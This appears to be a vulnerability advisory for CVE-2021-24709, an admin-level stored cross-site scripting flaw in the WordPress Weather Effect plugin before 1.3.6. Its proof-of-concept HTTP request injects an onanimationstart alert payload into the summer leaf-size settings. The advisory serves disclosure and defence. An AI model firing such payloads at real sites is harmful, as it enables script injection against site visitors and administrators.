Weather Effect < 1.3.6 – Admin+ Stored Cross-Site Scripting | CVE 2021-24709

Description

The plugin does not properly validate and escape some of its settings (like *_size_leaf, *_flakes_leaf, *_speed) which could lead to Stored Cross-Site Scripting issues

Proof of Concept

POST /wp-admin/admin.php?page=weather-effects-setting HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1991
Connection: close
Cookie: [admin+]


enable_weather_effect=1&weather_occasion=summer_check&christmas_types=snow_effect&christmas_ball=ball3&christmas_bell=bell3&christmas_candy=candy3&christmas_gift=gift3&christmas_snowman=snowman3&christmas_snow_flake=flack2&christmas_min_size_leaf=20&christmas_max_size_leaf=50&christmas_flakes_leaf=5&christmas_speed=5&master_round=false&round_type=true&min_size_round=4&max_size_round=20&master_shadows=false&shadow_type=true&flakes_shadow=50&snow_types=winter_snow&ice_cube=true&min_size_christmas=1&max_size_christmas=10&flake_christmas=5&min_size_falling=3&max_size_falling=30&snow_falling_time=500&snow_falling_color=FFFFFF&autumn_leaf=autumn-leaf2&autumn_min_size_leaf=20&autumn_max_size_leaf=50&autumn_flakes_leaf=5&autumn_speed=5&spring_leaf=spring-leaf1&spring_min_size_leaf=20&spring_max_size_leaf=30&spring_flakes_leaf=5&spring_speed=5&drink=drink&summer_drink=drink1&summer_sun=sun1&summer_min_size_leaf=%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f&summer_max_size_leaf=alert(/XSS/)%7c%7c30&summer_flakes_leaf=5&summer_speed=5&rain_umbrella=umbrella1&rain_drops=drops1&rain_cloud=cloud1&rain_min_size_leaf=20&rain_max_size_leaf=50&rain_flakes_leaf=5&rain_speed=5&halloween_ghost=ghost1&halloween_bats=bats1&halloween_moon=moon1&halloween_pumpkin=pumpkin1&halloween_web=web1&halloween_witch=witch1&halloween_min_size_leaf=20&halloween_max_size_leaf=50&halloween_flakes_leaf=5&halloween_speed=5&thanksgiving_turkey=turkey1&thanksgiving_min_size_leaf=20&thanksgiving_max_size_leaf=50&thanksgiving_flakes_leaf=5&thanksgiving_speed=5&valentine_rose=rose1&valentine_balloon=valentine_balloon1&valentine_heart=valentine_heart2&valentine_min_size_leaf=20&valentine_max_size_leaf=50&valentine_flakes_leaf=5&valentine_speed=5&newyear_balloon=newyear_balloon2&new_year_sticker=newyear_sticker1&newyear_min_size_leaf=20&newyear_max_size_leaf=50&newyear_flakes_leaf=5&newyear_speed=5&snow_action=save_setting&snow_action=save_setting&security=d648bbf655